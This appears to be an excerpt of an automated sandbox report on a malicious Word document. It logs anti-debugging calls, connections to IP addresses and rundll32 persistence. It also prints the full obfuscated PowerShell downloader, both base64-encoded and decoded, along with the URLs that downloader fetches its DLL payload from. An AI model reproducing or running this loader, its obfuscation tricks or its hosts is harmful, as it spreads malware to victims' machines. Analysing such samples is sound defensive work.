Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10003EE0 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_10003EE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10004076 SetUnhandledExceptionFilter,	8_2_10004076
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1000E144 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_1000E144
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10004171 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_10004171

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 152.170.79.100 80
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 190.247.139.101 80
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 138.197.99.250 144

Encrypted powershell cmdline option found

Show sources

Source: unknown	Process created: Base64 decoded set-Item vaRiaBLE:3vC ([TypE]("{5}{0}{1}{3}{2}{4}" -F'YSt','Em.Io','IREcTO','.d','Ry','S') ); SeT-ITEm VaRiABlE:549c ( [tYpe]("{4}{1}{0}{2}{3}" -F '.','ystEm','NET.SErvicePOin','TmAnAgER','S') ) ; $ErrorActionPreference = ('S'+('ile'+'n'+'tly')+('Co'+'n')+('t'+'inu')+'e');$A8h2rzb=$F6_A + [char](64) + $L98P;$M00O=('C'+('82'+'Z')); $3VC::"crea`T`E`D`iRecToRy"($HOME + ((('TyV'+'Xt'+'s_n')+('mfTyVP4'+'1')+'88'+('qk'+'T')+'yV') -rEplaCE ('T'+'yV'),[CHar]92));$C42N=(('C'+'13')+'D'); ( lS VARiAbLe:549C ).vaLuE::"sEcU`R`iTypRot`o`cOl" = ('T'+('l'+'s12'));$D77Y=('Z8'+'_V');$Wv6xb57 = (('U9'+'5')+'D');$H01V=(('G9'+'6')+'H');$Tzo7twl=$HOME+(('Jj'+'W'+('Xt'+'s_nm'+'fJjWP4'+'18')+'8'+('q'+'kJ')+'j'+'W')-cRePlaCE ('Jj'+'W'),[CHAR]92)+$Wv6xb57+('.'+('d'+'ll'));$X56P=('L'+('67'+'Q'));$Wt_5wkc=(']b'+('2[s'+':')+('/'+'/'+'fmca')+'v.'+('com'+'/')+('ima'+'ges')+'/7'+('FV4N'+'d'+'/@]b2[s')+(':'+'//')+('thepr'+'a')+('ji'+'n')+('sh'+'ee.')+('c'+'om/ot')+('h'+'e'+'rf'+'iles'+'/wAFP/')+'@]'+('b2[s:'+'/'+'/'+'www.remov'+'ep')+('ctr'+'o')+'ja'+('n'+'.c')+('om/w'+'p')+('-'+'adm')+'in'+'/'+('ak'+'0')+'c'+'h'+('H'+'/@'+']b2')+('[s'+':')+('//w'+'ww.')+'g'+('e'+'osr')+'t.'+('c'+'om')+('/aqq'+'h')+('w'+'dap')+('/l'+'0/@'+']b2[s:')+'//'+'ge'+'o'+'f'+'f'+'og'+('l'+'emusi'+'c.')+'c'+('o'+'m/wp')+('-'+'ad')+('mi'+'n/')+('7'+'C1')+'1'+('o'+'AC/@')+(']b'+'2[s')+(':'+'//')+'ww'+('w'+'.achuta'+'m'+'an')+'as'+('a.'+'c')+('om'+'/g')+'ar'+'mi'+'n'+'-'+('p'+'ro-f')+('e'+'i8o/')+('mW'+'/')+('@]'+'b')
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded set-Item vaRiaBLE:3vC ([TypE]("{5}{0}{1}{3}{2}{4}" -F'YSt','Em.Io','IREcTO','.d','Ry','S') ); SeT-ITEm VaRiABlE:549c ( [tYpe]("{4}{1}{0}{2}{3}" -F '.','ystEm','NET.SErvicePOin','TmAnAgER','S') ) ; $ErrorActionPreference = ('S'+('ile'+'n'+'tly')+('Co'+'n')+('t'+'inu')+'e');$A8h2rzb=$F6_A + [char](64) + $L98P;$M00O=('C'+('82'+'Z')); $3VC::"crea`T`E`D`iRecToRy"($HOME + ((('TyV'+'Xt'+'s_n')+('mfTyVP4'+'1')+'88'+('qk'+'T')+'yV') -rEplaCE ('T'+'yV'),[CHar]92));$C42N=(('C'+'13')+'D'); ( lS VARiAbLe:549C ).vaLuE::"sEcU`R`iTypRot`o`cOl" = ('T'+('l'+'s12'));$D77Y=('Z8'+'_V');$Wv6xb57 = (('U9'+'5')+'D');$H01V=(('G9'+'6')+'H');$Tzo7twl=$HOME+(('Jj'+'W'+('Xt'+'s_nm'+'fJjWP4'+'18')+'8'+('q'+'kJ')+'j'+'W')-cRePlaCE ('Jj'+'W'),[CHAR]92)+$Wv6xb57+('.'+('d'+'ll'));$X56P=('L'+('67'+'Q'));$Wt_5wkc=(']b'+('2[s'+':')+('/'+'/'+'fmca')+'v.'+('com'+'/')+('ima'+'ges')+'/7'+('FV4N'+'d'+'/@]b2[s')+(':'+'//')+('thepr'+'a')+('ji'+'n')+('sh'+'ee.')+('c'+'om/ot')+('h'+'e'+'rf'+'iles'+'/wAFP/')+'@]'+('b2[s:'+'/'+'/'+'www.remov'+'ep')+('ctr'+'o')+'ja'+('n'+'.c')+('om/w'+'p')+('-'+'adm')+'in'+'/'+('ak'+'0')+'c'+'h'+('H'+'/@'+']b2')+('[s'+':')+('//w'+'ww.')+'g'+('e'+'osr')+'t.'+('c'+'om')+('/aqq'+'h')+('w'+'dap')+('/l'+'0/@'+']b2[s:')+'//'+'ge'+'o'+'f'+'f'+'og'+('l'+'emusi'+'c.')+'c'+('o'+'m/wp')+('-'+'ad')+('mi'+'n/')+('7'+'C1')+'1'+('o'+'AC/@')+(']b'+'2[s')+(':'+'//')+'ww'+('w'+'.achuta'+'m'+'an')+'as'+('a.'+'c')+('om'+'/g')+'ar'+'mi'+'n'+'-'+('p'+'ro-f')+('e'+'i8o/')+('mW'+'/')+('@]'+'b')			Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgAHMAZQB0AC0ASQB0AGUAbQAgAHYAYQBSAGkAYQBCAEwARQA6ADMAdgBDACAAIAAoAFsAVAB5AHAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADEAfQB7ADMAfQB7ADIAfQB7ADQAfQAiACAALQBGACcAWQBTAHQAJwAsACcARQBtAC4ASQBvACcALAAnAEkAUgBFAGMAVABPACcALAAnAC4AZAAnACwAJwBSAHkAJwAsACcAUwAnACkAIAAgACkAOwAgACAAIABTAGUAVAAtAEkAVABFAG0AIAAgAFYAYQBSAGkAQQBCAGwARQA6ADUANAA5AGMAIAAgACgAIAAgAFsAdABZAHAAZQBdACgAIgB7ADQAfQB7ADEAfQB7ADAAfQB7ADIAfQB7ADMAfQAiACAALQBGACAAJwAuACcALAAnAHkAcwB0AEUAbQAnACwAJwBOAEUAVAAuAFMARQByAHYAaQBjAGUAUABPAGkAbgAnACwAJwBUAG0AQQBuAEEAZwBFAFIAJwAsACcAUwAnACkAIAApACAAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwAnACsAKAAnAGkAbABlACcAKwAnAG4AJwArACcAdABsAHkAJwApACsAKAAnAEMAbwAnACsAJwBuACcAKQArACgAJwB0ACcAKwAnAGkAbgB1ACcAKQArACcAZQAnACkAOwAkAEEAOABoADIAcgB6AGIAPQAkAEYANgBfAEEAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEwAOQA4AFAAOwAkAE0AMAAwAE8APQAoACcAQwAnACsAKAAnADgAMgAnACsAJwBaACcAKQApADsAIAAkADMAVgBDADoAOgAiAGMAcgBlAGEAYABUAGAARQBgAEQAYABpAFIAZQBjAFQAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAFQAeQBWACcAKwAnAFgAdAAnACsAJwBzAF8AbgAnACkAKwAoACcAbQBmAFQAeQBWAFAANAAnACsAJwAxACcAKQArACcAOAA4ACcAKwAoACcAcQBrACcAKwAnAFQAJwApACsAJwB5AFYAJwApACAALQByAEUAcABsAGEAQwBFACAAIAAoACcAVAAnACsAJwB5AFYAJwApACwAWwBDAEgAYQByAF0AOQAyACkAKQA7ACQAQwA0ADIATgA9ACgAKAAnAEMAJwArACcAMQAzACcAKQArACcARAAnACkAOwAgACAAKAAgAGwAUwAgACAAVgBBAFIAaQBBAGIATABlADoANQA0ADkAQwAgACkALgB2AGEATAB1AEUAOgA6ACIAcwBFAGMAVQBgAFIAYABpAFQAeQBwAFIAbwB0AGAAbwBgAGMATwBsACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABEADcANwBZAD0AKAAnAFoAOAAnACsAJwBfAFYAJwApADsAJABXAHYANgB4AGIANQA3ACAAPQAgACgAKAAnAFUAOQAnACsAJwA1ACcAKQArACcARAAnACkAOwAkAEgAMAAxAFYAPQAoACgAJwBHADkAJwArACcANgAnACkAKwAnAEgAJwApADsAJABUAHoAbwA3AHQAdwBsAD0AJABIAE8ATQBFACsAKAAoACcASgBqACcAKwAnAFcAJwArACgAJwBYAHQAJwArACcAcwBfAG4AbQAnACsAJwBmAEoAagBXAFAANAAnACsAJwAxADgAJwApACsAJwA4ACcAKwAoACcAcQAnACsAJwBrAEoAJwApACsAJwBqACcAKwAnAFcAJwApAC0AYwBSAGUAUABsAGEAQwBFACAAKAAnAEoAagAnACsAJwBXACcAKQAsAFsAQwBIAEEAUgBdADkAMgApACsAJABXAHYANgB4AGIANQA3ACsAKAAnAC4AJwArACgAJwBkACcAKwAnAGwAbAAnACkAKQA7ACQAWAA1ADYAUAA9ACgAJwBMACcAKwAoACcANgA3ACcAKwAnAFEAJwApACkAOwAkAFcAdABfADUAdwBrAGMAPQAoACcAXQBiACcAKwAoACcAMgBbAHMAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvACcAKwAnAGYAbQBjAGEAJwApACsAJwB2AC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACgAJwBpAG0AYQAnACsAJwBnAGUAcwAnACkAKwAnAC8ANwAnACsAKAAnAEYAVgA0AE4AJwArACcAZAAnACsAJwAvAEAAXQBiADIAWwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAdABoAGUAcAByACcAKwAnAGEAJwApACsAKAAnAGoAaQAnACsAJwBuACcAKQArACgAJwBzAGgAJwArACcAZQBlAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AbwB0ACcAKQArACgAJwBoACcAKwAnAGUAJwArACcAcgBmACcAKwAnAGkAbABlAHMAJwArACcALwB3AEEARgBQAC8AJwApACsAJwBAAF0AJwArACgAJwBiADIAWwBzADoAJwArACcALwAnACsAJwAvACcAKwAnAHcAdwB3AC4AcgBlAG0AbwB2ACcAKwAnAGUAcAAnACkAKwAoACcAYwB0AHIAJwArACcAbwAnACkAKwAnAGoAYQAnACsAKAAnAG4AJwArACcALgBjACcAKQArACgAJwBvAG0ALwB3ACcAKwAnAHAAJwApACsAKAAnAC0AJwArACcAYQBkAG0AJwApACsAJwBpAG4AJ	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Xts_nmf\P4188qk\U95D.dll Control_RunDLL	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Xts_nmf\P4188qk\U95D.dll Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sfwveevpdqixuom\bsjtfkdrderxek.bnn',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vobicwh\otzfel.hzn',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uxgydceommtwiki\qzhrxsieatmrnj.xlc',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bdzitbg\obtbak.jsi',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xewbyzlpihpnskgh\wwdzuofqhkcpmfa.gyu',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qakdocqxk\cjwfvfif.ylv',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hutifyziasbygiy\qhmiqrfpmiryum.ywy',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Tsbimf\rxvqt.dyw',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zqkhe\wtjq.kha',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rimdqgeexmnm\pcwmnbkufem.jtj',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xoteg\llch.amx',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vaxphioewmusne\ukdxjhhssdymm.ubj',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Widpnptibmnvlc\vizfdwjpjtiec.yqj',Control_RunDLL

Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgAHMAZQB0AC0ASQB0AGUAbQAgAHYAYQBSAGkAYQBCAEwARQA6ADMAdgBDACAAIAAoAFsAVAB5AHAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADEAfQB7ADMAfQB7ADIAfQB7ADQAfQAiACAALQBGACcAWQBTAHQAJwAsACcARQBtAC4ASQBvACcALAAnAEkAUgBFAGMAVABPACcALAAnAC4AZAAnACwAJwBSAHkAJwAsACcAUwAnACkAIAAgACkAOwAgACAAIABTAGUAVAAtAEkAVABFAG0AIAAgAFYAYQBSAGkAQQBCAGwARQA6ADUANAA5AGMAIAAgACgAIAAgAFsAdABZAHAAZQBdACgAIgB7ADQAfQB7ADEAfQB7ADAAfQB7ADIAfQB7ADMAfQAiACAALQBGACAAJwAuACcALAAnAHkAcwB0AEUAbQAnACwAJwBOAEUAVAAuAFMARQByAHYAaQBjAGUAUABPAGkAbgAnACwAJwBUAG0AQQBuAEEAZwBFAFIAJwAsACcAUwAnACkAIAApACAAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwAnACsAKAAnAGkAbABlACcAKwAnAG4AJwArACcAdABsAHkAJwApACsAKAAnAEMAbwAnACsAJwBuACcAKQArACgAJwB0ACcAKwAnAGkAbgB1ACcAKQArACcAZQAnACkAOwAkAEEAOABoADIAcgB6AGIAPQAkAEYANgBfAEEAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEwAOQA4AFAAOwAkAE0AMAAwAE8APQAoACcAQwAnACsAKAAnADgAMgAnACsAJwBaACcAKQApADsAIAAkADMAVgBDADoAOgAiAGMAcgBlAGEAYABUAGAARQBgAEQAYABpAFIAZQBjAFQAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAFQAeQBWACcAKwAnAFgAdAAnACsAJwBzAF8AbgAnACkAKwAoACcAbQBmAFQAeQBWAFAANAAnACsAJwAxACcAKQArACcAOAA4ACcAKwAoACcAcQBrACcAKwAnAFQAJwApACsAJwB5AFYAJwApACAALQByAEUAcABsAGEAQwBFACAAIAAoACcAVAAnACsAJwB5AFYAJwApACwAWwBDAEgAYQByAF0AOQAyACkAKQA7ACQAQwA0ADIATgA9ACgAKAAnAEMAJwArACcAMQAzACcAKQArACcARAAnACkAOwAgACAAKAAgAGwAUwAgACAAVgBBAFIAaQBBAGIATABlADoANQA0ADkAQwAgACkALgB2AGEATAB1AEUAOgA6ACIAcwBFAGMAVQBgAFIAYABpAFQAeQBwAFIAbwB0AGAAbwBgAGMATwBsACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABEADcANwBZAD0AKAAnAFoAOAAnACsAJwBfAFYAJwApADsAJABXAHYANgB4AGIANQA3ACAAPQAgACgAKAAnAFUAOQAnACsAJwA1ACcAKQArACcARAAnACkAOwAkAEgAMAAxAFYAPQAoACgAJwBHADkAJwArACcANgAnACkAKwAnAEgAJwApADsAJABUAHoAbwA3AHQAdwBsAD0AJABIAE8ATQBFACsAKAAoACcASgBqACcAKwAnAFcAJwArACgAJwBYAHQAJwArACcAcwBfAG4AbQAnACsAJwBmAEoAagBXAFAANAAnACsAJwAxADgAJwApACsAJwA4ACcAKwAoACcAcQAnACsAJwBrAEoAJwApACsAJwBqACcAKwAnAFcAJwApAC0AYwBSAGUAUABsAGEAQwBFACAAKAAnAEoAagAnACsAJwBXACcAKQAsAFsAQwBIAEEAUgBdADkAMgApACsAJABXAHYANgB4AGIANQA3ACsAKAAnAC4AJwArACgAJwBkACcAKwAnAGwAbAAnACkAKQA7ACQAWAA1ADYAUAA9ACgAJwBMACcAKwAoACcANgA3ACcAKwAnAFEAJwApACkAOwAkAFcAdABfADUAdwBrAGMAPQAoACcAXQBiACcAKwAoACcAMgBbAHMAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvACcAKwAnAGYAbQBjAGEAJwApACsAJwB2AC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACgAJwBpAG0AYQAnACsAJwBnAGUAcwAnACkAKwAnAC8ANwAnACsAKAAnAEYAVgA0AE4AJwArACcAZAAnACsAJwAvAEAAXQBiADIAWwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAdABoAGUAcAByACcAKwAnAGEAJwApACsAKAAnAGoAaQAnACsAJwBuACcAKQArACgAJwBzAGgAJwArACcAZQBlAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AbwB0ACcAKQArACgAJwBoACcAKwAnAGUAJwArACcAcgBmACcAKwAnAGkAbABlAHMAJwArACcALwB3AEEARgBQAC8AJwApACsAJwBAAF0AJwArACgAJwBiADIAWwBzADoAJwArACcALwAnACsAJwAvACcAKwAnAHcAdwB3AC4AcgBlAG0AbwB2ACcAKwAnAGUAcAAnACkAKwAoACcAYwB0AHIAJwArACcAbwAnACkAKwAnAGoAYQAnACsAKAAnAG4AJwArACcALgBjACcAKQArACgAJwBvAG0A
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgAHMAZQB0AC0ASQB0AGUAbQAgAHYAYQBSAGkAYQBCAEwARQA6ADMAdgBDACAAIAAoAFsAVAB5AHAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADEAfQB7ADMAfQB7ADIAfQB7ADQAfQAiACAALQBGACcAWQBTAHQAJwAsACcARQBtAC4ASQBvACcALAAnAEkAUgBFAGMAVABPACcALAAnAC4AZAAnACwAJwBSAHkAJwAsACcAUwAnACkAIAAgACkAOwAgACAAIABTAGUAVAAtAEkAVABFAG0AIAAgAFYAYQBSAGkAQQBCAGwARQA6ADUANAA5AGMAIAAgACgAIAAgAFsAdABZAHAAZQBdACgAIgB7ADQAfQB7ADEAfQB7ADAAfQB7ADIAfQB7ADMAfQAiACAALQBGACAAJwAuACcALAAnAHkAcwB0AEUAbQAnACwAJwBOAEUAVAAuAFMARQByAHYAaQBjAGUAUABPAGkAbgAnACwAJwBUAG0AQQBuAEEAZwBFAFIAJwAsACcAUwAnACkAIAApACAAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwAnACsAKAAnAGkAbABlACcAKwAnAG4AJwArACcAdABsAHkAJwApACsAKAAnAEMAbwAnACsAJwBuACcAKQArACgAJwB0ACcAKwAnAGkAbgB1ACcAKQArACcAZQAnACkAOwAkAEEAOABoADIAcgB6AGIAPQAkAEYANgBfAEEAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEwAOQA4AFAAOwAkAE0AMAAwAE8APQAoACcAQwAnACsAKAAnADgAMgAnACsAJwBaACcAKQApADsAIAAkADMAVgBDADoAOgAiAGMAcgBlAGEAYABUAGAARQBgAEQAYABpAFIAZQBjAFQAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAFQAeQBWACcAKwAnAFgAdAAnACsAJwBzAF8AbgAnACkAKwAoACcAbQBmAFQAeQBWAFAANAAnACsAJwAxACcAKQArACcAOAA4ACcAKwAoACcAcQBrACcAKwAnAFQAJwApACsAJwB5AFYAJwApACAALQByAEUAcABsAGEAQwBFACAAIAAoACcAVAAnACsAJwB5AFYAJwApACwAWwBDAEgAYQByAF0AOQAyACkAKQA7ACQAQwA0ADIATgA9ACgAKAAnAEMAJwArACcAMQAzACcAKQArACcARAAnACkAOwAgACAAKAAgAGwAUwAgACAAVgBBAFIAaQBBAGIATABlADoANQA0ADkAQwAgACkALgB2AGEATAB1AEUAOgA6ACIAcwBFAGMAVQBgAFIAYABpAFQAeQBwAFIAbwB0AGAAbwBgAGMATwBsACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABEADcANwBZAD0AKAAnAFoAOAAnACsAJwBfAFYAJwApADsAJABXAHYANgB4AGIANQA3ACAAPQAgACgAKAAnAFUAOQAnACsAJwA1ACcAKQArACcARAAnACkAOwAkAEgAMAAxAFYAPQAoACgAJwBHADkAJwArACcANgAnACkAKwAnAEgAJwApADsAJABUAHoAbwA3AHQAdwBsAD0AJABIAE8ATQBFACsAKAAoACcASgBqACcAKwAnAFcAJwArACgAJwBYAHQAJwArACcAcwBfAG4AbQAnACsAJwBmAEoAagBXAFAANAAnACsAJwAxADgAJwApACsAJwA4ACcAKwAoACcAcQAnACsAJwBrAEoAJwApACsAJwBqACcAKwAnAFcAJwApAC0AYwBSAGUAUABsAGEAQwBFACAAKAAnAEoAagAnACsAJwBXACcAKQAsAFsAQwBIAEEAUgBdADkAMgApACsAJABXAHYANgB4AGIANQA3ACsAKAAnAC4AJwArACgAJwBkACcAKwAnAGwAbAAnACkAKQA7ACQAWAA1ADYAUAA9ACgAJwBMACcAKwAoACcANgA3ACcAKwAnAFEAJwApACkAOwAkAFcAdABfADUAdwBrAGMAPQAoACcAXQBiACcAKwAoACcAMgBbAHMAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvACcAKwAnAGYAbQBjAGEAJwApACsAJwB2AC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACgAJwBpAG0AYQAnACsAJwBnAGUAcwAnACkAKwAnAC8ANwAnACsAKAAnAEYAVgA0AE4AJwArACcAZAAnACsAJwAvAEAAXQBiADIAWwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAdABoAGUAcAByACcAKwAnAGEAJwApACsAKAAnAGoAaQAnACsAJwBuACcAKQArACgAJwBzAGgAJwArACcAZQBlAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AbwB0ACcAKQArACgAJwBoACcAKwAnAGUAJwArACcAcgBmACcAKwAnAGkAbABlAHMAJwArACcALwB3AEEARgBQAC8AJwApACsAJwBAAF0AJwArACgAJwBiADIAWwBzADoAJwArACcALwAnACsAJwAvACcAKwAnAHcAdwB3AC4AcgBlAG0AbwB2ACcAKwAnAGUAcAAnACkAKwAoACcAYwB0AHIAJwArACcAbwAnACkAKwAnAGoAYQAnACsAKAAnAG4AJwArACcALgBjACcAKQArACgAJwBvAG0ALwB3ACcAKwAnAHAAJwApACsAKAAnAC0AJwArACcAYQBkAG0AJwApACsAJwBpAG4AJ
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgAHMAZQB0AC0ASQB0AGUAbQAgAHYAYQBSAGkAYQBCAEwARQA6ADMAdgBDACAAIAAoAFsAVAB5AHAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADEAfQB7ADMAfQB7ADIAfQB7ADQAfQAiACAALQBGACcAWQBTAHQAJwAsACcARQBtAC4ASQBvACcALAAnAEkAUgBFAGMAVABPACcALAAnAC4AZAAnACwAJwBSAHkAJwAsACcAUwAnACkAIAAgACkAOwAgACAAIABTAGUAVAAtAEkAVABFAG0AIAAgAFYAYQBSAGkAQQBCAGwARQA6ADUANAA5AGMAIAAgACgAIAAgAFsAdABZAHAAZQBdACgAIgB7ADQAfQB7ADEAfQB7ADAAfQB7ADIAfQB7ADMAfQAiACAALQBGACAAJwAuACcALAAnAHkAcwB0AEUAbQAnACwAJwBOAEUAVAAuAFMARQByAHYAaQBjAGUAUABPAGkAbgAnACwAJwBUAG0AQQBuAEEAZwBFAFIAJwAsACcAUwAnACkAIAApACAAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwAnACsAKAAnAGkAbABlACcAKwAnAG4AJwArACcAdABsAHkAJwApACsAKAAnAEMAbwAnACsAJwBuACcAKQArACgAJwB0ACcAKwAnAGkAbgB1ACcAKQArACcAZQAnACkAOwAkAEEAOABoADIAcgB6AGIAPQAkAEYANgBfAEEAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEwAOQA4AFAAOwAkAE0AMAAwAE8APQAoACcAQwAnACsAKAAnADgAMgAnACsAJwBaACcAKQApADsAIAAkADMAVgBDADoAOgAiAGMAcgBlAGEAYABUAGAARQBgAEQAYABpAFIAZQBjAFQAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAFQAeQBWACcAKwAnAFgAdAAnACsAJwBzAF8AbgAnACkAKwAoACcAbQBmAFQAeQBWAFAANAAnACsAJwAxACcAKQArACcAOAA4ACcAKwAoACcAcQBrACcAKwAnAFQAJwApACsAJwB5AFYAJwApACAALQByAEUAcABsAGEAQwBFACAAIAAoACcAVAAnACsAJwB5AFYAJwApACwAWwBDAEgAYQByAF0AOQAyACkAKQA7ACQAQwA0ADIATgA9ACgAKAAnAEMAJwArACcAMQAzACcAKQArACcARAAnACkAOwAgACAAKAAgAGwAUwAgACAAVgBBAFIAaQBBAGIATABlADoANQA0ADkAQwAgACkALgB2AGEATAB1AEUAOgA6ACIAcwBFAGMAVQBgAFIAYABpAFQAeQBwAFIAbwB0AGAAbwBgAGMATwBsACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABEADcANwBZAD0AKAAnAFoAOAAnACsAJwBfAFYAJwApADsAJABXAHYANgB4AGIANQA3ACAAPQAgACgAKAAnAFUAOQAnACsAJwA1ACcAKQArACcARAAnACkAOwAkAEgAMAAxAFYAPQAoACgAJwBHADkAJwArACcANgAnACkAKwAnAEgAJwApADsAJABUAHoAbwA3AHQAdwBsAD0AJABIAE8ATQBFACsAKAAoACcASgBqACcAKwAnAFcAJwArACgAJwBYAHQAJwArACcAcwBfAG4AbQAnACsAJwBmAEoAagBXAFAANAAnACsAJwAxADgAJwApACsAJwA4ACcAKwAoACcAcQAnACsAJwBrAEoAJwApACsAJwBqACcAKwAnAFcAJwApAC0AYwBSAGUAUABsAGEAQwBFACAAKAAnAEoAagAnACsAJwBXACcAKQAsAFsAQwBIAEEAUgBdADkAMgApACsAJABXAHYANgB4AGIANQA3ACsAKAAnAC4AJwArACgAJwBkACcAKwAnAGwAbAAnACkAKQA7ACQAWAA1ADYAUAA9ACgAJwBMACcAKwAoACcANgA3ACcAKwAnAFEAJwApACkAOwAkAFcAdABfADUAdwBrAGMAPQAoACcAXQBiACcAKwAoACcAMgBbAHMAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvACcAKwAnAGYAbQBjAGEAJwApACsAJwB2AC4A